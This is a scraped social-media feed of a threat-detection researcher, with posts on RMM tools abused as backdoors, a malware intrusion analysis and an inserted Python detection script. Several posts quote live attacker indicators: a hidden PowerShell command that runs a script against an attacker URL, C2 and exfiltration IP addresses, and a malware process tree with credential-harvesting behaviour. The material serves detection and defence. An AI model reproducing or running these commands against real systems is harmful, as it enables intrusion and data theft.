KoifSec (@KoifSec)
115 posts

Security research/detection, also writing for https://t.co/8C74RVZYox. Base64 Enjoyer. Clippy is a threat actor. BSKY https://t.co/JoPhPt9VcN

Joined December 2021
176 Following, 127 Followers
KoifSec (@KoifSec):
@m45c07 Thank you brother, glad you enjoyed!
M45C07 (@m45c07):
@KoifSec I am almost finished with this one, at the very first I was only confused due to the fact only questions were stated without answer to them, however as I progressed through the book and started thinking, the stuff clicked. Highly recommend this one for people in the field.
KoifSec reposted
MagicSword (@magicswordio):
Komari just landed in LOLRMM and this one's different. Komari doesn't need to be abused to function as a C2. The control channel ships enabled by default. You point it at a server you control and type an install command. That's it. @HuntressLabs caught it being dropped as a SYSTEM-level backdoor, disguised as "Windows Update Service", pulled straight from GitHub. The line between "self-hosted monitoring" and "self-hosted C2" doesn't exist here. That's exactly why it belongs in the catalog. Thanks @KoifSec for the contribution. 🫡 🔗 lolrmm.io/tools/komari 🧩 github.com/magicsword-io/… 📖 huntress.com/blog/komari-c2…
KoifSec (@KoifSec):
Published a new post right now on DetectFYI: "The Life-Dinner Principle in Detection", continuing from the latest post about arms race dynamics. Enjoy! detect.fyi/the-life-dinne…
Aura (@SecurityAura):
C:\ProgramData\wt.exe All I have to say. This is a fucking meme at this point. IYKYK.
KoifSec (@KoifSec):
Found a TP today from the Axios incident. The observed command was:

C:\ProgramData\wt.exe -w hidden -ep bypass -file C:\Users\xxx\AppData\Local\Temp\6202033.ps1 http://sfrclak.[com]:8000

wt.exe running from unusual directories. Thanks to @HuntressLabs for their research on this.
Kostas (@Kostastsale):
Today I’m launching Threat Hunting Labs. Over the years I’ve analyzed many real-world intrusions. One thing became obvious: most training platforms don’t resemble how investigations actually happen. So I built something different. Threat Hunting Labs focuses on investigation-driven learning using real telemetry and structured investigative paths. If you want to get better at investigating breaches, you should practice investigating breaches. More details here: threathuntinglabs.com/blog/introduci…
KoifSec (@KoifSec):
@Kostastsale I had the pleasure of beta testing this, highly recommended if this is something you're interested in. Everything Kostas does is worth looking into!
KoifSec (@KoifSec):
New post out! "The Red Queen’s Race: Arms Race Dynamics in Threat Detection" medium.com/@koifsec/the-red-queens-race-arms-race-dynamics-in-threat-detection-4f532a149fda
KoifSec (@KoifSec):
@itsJaimeMedina Great writeup! gonna start testing it out for myself 🙂
Jaime Medina (@itsJaimeMedina):
Lots of talk about AI coding workflows. Not a lot of "here's exactly how I do it." I'm sharing my exact workflow for using 3 different AI agents (Claude Code, Codex, Gemini) to build, challenge, and fix each other's work. Nothing fancy, just plain vanilla CLI communication to ship features for @FileGrabLink, so let's break it down in this thread:
KoifSec (@KoifSec):
If you're dealing with code packages or supply-chain risks, just open-sourced one of my tools - deps.sh - completely usable from the CLI as well. Enjoy!
KoifSec (@KoifSec):
@ThruntingLabs I was one of the lucky firsts - I HIGHLY recommend trying this out if you get the chance - this one is different.
KoifSec reposted
Threat Hunting Labs (@ThruntingLabs):
We invited the first 150 users who signed up for early access. All invitees receive free credits to go through the investigations we currently have in beta. Great feedback so far!🙏 We will invite the second wave early next week! Thank you to everyone who is providing feedback!
DFIR Diva (@DfirDiva):
📣 I partnered with @13CubedDFIR for a Valentine's Day Giveaway! 🎁
🏆 1 Grand Prize winner will receive one course of their choice from the list below + a 13Cubed Investigator T-Shirt.
Courses:
- Investigating Windows Endpoints
- Investigating Windows Memory
- Investigating macOS Endpoints
- Investigating Linux Devices
Each course comes with a Certificate of Completion as well as Certification attempts.
👕 5 winners will receive 13Cubed Investigator T-Shirts.
To Enter:
✅ Like
✅ Comment with the name of the course you want to win
✅ Repost
On Valentine's Day (February 14th, 2026) entries from across three social media platforms will be combined and winners will be selected.
For more info check out:
13Cubed Courses: training.13cubed.com
Certification Information: training.13cubed.com/certifications
T-Shirts: shop.13cubed.com
#DFIR #DigitalForensics #IncidentResponse
KoifSec (@KoifSec):
Introducing the "Adversarial Detection Engineering (ADE) Framework"! Developed by myself and Nikolas Bielski, ADE aims to be for detection rules what MITRE is for attack techniques and CWE is for code. github.com/NikolasBielski… adeframework.org
KoifSec reposted
Kostas (@Kostastsale):
I came across a GhostPulse/HijackLoader intrusion via ClickFix with some interesting evasion techniques. Starts with a PowerShell cradle (178.17.59\.26:5506) deploying an MSI dropper. The GhostPulse loader (81f9a196...) has 0 detections on VT despite being a known binary — still figuring out how it was weaponized: virustotal.com/gui/file/81f9a…

PlaneV128.exe registers a keylogger (RegisterRawInputDevices), injects into Chrome/Edge via SetThreadContext, and launches browsers in headless mode for credential harvesting. Hardware breakpoints set for anti-debugging.

PlaneV128.exe dropped sup.msi (164MB) which extracted the superintendent application during its update routine. 172MB exfil to 84.21.173.142:80 over ~18 min. Persistence via Run key (HyperPackQuickCoreator → C:\Users\\AppData\Local\MegaMaxion\superintendent.exe). The superintendent.exe binary appears to be legitimate software, currently investigating for possible DLL side-loading…

explorer.exe
└─ powershell.exe -nop -w hidden
   └─ msiexec.exe s1161271080.msi
      └─ S_Circuitr.exe
         └─ PlaneV128.exe (GhostPulse)
            ├─ chrome.exe --headless
            ├─ msedge.exe --headless
            └─ msiexec.exe sup.msi
               └─ superintendent.exe

Signed executables using ZONER/Crisp IM certificates observed throughout the chain.

Links:
• joesandbox.com/analysis/18627…
• tria.ge/260205-ce1n5sd…
• bazaar.abuse.ch/sample/d63f35e…

Hunt for PowerShell cradles paired with --headless browser launches. What's particularly interesting: Multiple components have zero detection. If you've seen similar intrusions or have insights on superintendent.exe/this chain, please comment below or reach out. cc @malwrhunterteam
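A small triage script, added here as an example and not code from any of the posts above, for the two hunts this feed mentions: wt.exe launched from an unusual directory (the Axios-incident post earlier in the feed) and a headless Chrome/Edge whose ancestry contains a hidden-window PowerShell (the hunt suggested at the end of the post directly above). The process events, PIDs, paths and the example.invalid domain are constructed; the expected install directory for wt.exe and the set of PowerShell-style switches checked are assumptions made for this example.

```python
# Added example (not code from any of the posts in this feed): triage
# process-creation events for two hunts mentioned above. Everything below
# is constructed sample data.
from dataclasses import dataclass
import ntpath
from typing import Dict, List, Optional

# Assumption for this example: where Windows Terminal's wt.exe normally lives.
EXPECTED_WT_DIRS = ("c:\\program files\\windowsapps\\",)

# PowerShell-style switches. The real Windows Terminal does not take these,
# so seeing them on a wt.exe command line is worth a closer look.
PS_SWITCHES = {"-nop", "-noprofile", "-w", "-windowstyle", "-ep", "-executionpolicy",
               "-file", "-enc", "-encodedcommand", "-c", "-command"}


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


def _basename(path: str) -> str:
    # ntpath handles Windows paths on any host OS
    return ntpath.basename(path).lower()


def wt_from_unusual_dir(ev: ProcEvent) -> Optional[dict]:
    """Flag wt.exe started outside its expected install directory."""
    if _basename(ev.image) != "wt.exe":
        return None
    folder = ntpath.dirname(ev.image).lower() + "\\"
    if folder.startswith(EXPECTED_WT_DIRS):
        return None
    switches = sorted(PS_SWITCHES.intersection(t.lower() for t in ev.cmdline.split()))
    return {"rule": "wt_unusual_dir", "pid": ev.pid, "image": ev.image, "ps_switches": switches}


def headless_browser_under_ps_cradle(ev: ProcEvent, by_pid: Dict[int, ProcEvent],
                                     max_depth: int = 8) -> Optional[dict]:
    """Flag a headless Chrome/Edge with a hidden-window PowerShell among its ancestors."""
    if _basename(ev.image) not in {"chrome.exe", "msedge.exe"} or "--headless" not in ev.cmdline.lower():
        return None
    chain = [_basename(ev.image)]
    cur = by_pid.get(ev.ppid)
    for _ in range(max_depth):          # walk up the ppid chain, bounded
        if cur is None:
            break
        chain.append(_basename(cur.image))
        cl = cur.cmdline.lower()
        if _basename(cur.image) == "powershell.exe" and ("-w hidden" in cl or "-windowstyle hidden" in cl):
            return {"rule": "headless_browser_under_ps_cradle", "pid": ev.pid, "chain": " <- ".join(chain)}
        cur = by_pid.get(cur.ppid)
    return None


def triage(events: List[ProcEvent]) -> List[dict]:
    """Run both rules over a batch of events and return the findings in event order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        for rule in (wt_from_unusual_dir, lambda e: headless_browser_under_ps_cradle(e, by_pid)):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample: one chain patterned on the process tree in the post above,
# plus benign lookalikes. PIDs, user names and the example.invalid host are made up.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -nop -w hidden"),
    ProcEvent(300, 200, r"C:\Windows\System32\msiexec.exe", "msiexec.exe s1161271080.msi"),
    ProcEvent(400, 300, r"C:\Users\user\AppData\Local\Temp\S_Circuitr.exe", "S_Circuitr.exe"),
    ProcEvent(500, 400, r"C:\Users\user\AppData\Local\Temp\PlaneV128.exe", "PlaneV128.exe"),
    ProcEvent(600, 500, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe --headless"),
    ProcEvent(700, 500, r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", "msedge.exe --headless"),
    # Benign: headless Chrome driven by a dev tool, no PowerShell cradle above it.
    ProcEvent(800, 100, r"C:\Program Files\nodejs\node.exe", "node.exe test.js"),
    ProcEvent(810, 800, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe --headless --screenshot"),
    # wt.exe from ProgramData with PowerShell-style switches, shaped like the Axios-incident command line.
    ProcEvent(900, 100, r"C:\ProgramData\wt.exe",
              r"C:\ProgramData\wt.exe -w hidden -ep bypass -file C:\Users\user\AppData\Local\Temp\6202033.ps1 http://example.invalid:8000"),
    # Benign: the real Windows Terminal from its store install path.
    ProcEvent(910, 100, r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_x64\wt.exe", "wt.exe"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

On the sample data the script returns three findings: both headless browsers under the hidden PowerShell cradle (with the full ancestor chain recorded for the analyst) and the ProgramData wt.exe with its PowerShell-style switches, while the node-driven headless Chrome and the store-installed wt.exe stay quiet. Ancestry is walked through the parent PID with a depth bound, which is what makes the rule survive the several intermediate droppers in the tree above.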
KoifSec reposted
Aura (@SecurityAura):
#GoreloRMM being pushed via a suspected email phishing campaign where the URL leads the user to a site with a "Download Proposal" button. This downloads a raw Gorelo installer. Same lure/tactic used as another campaign at the beginning of the month that pushed #ImmyBot. VT next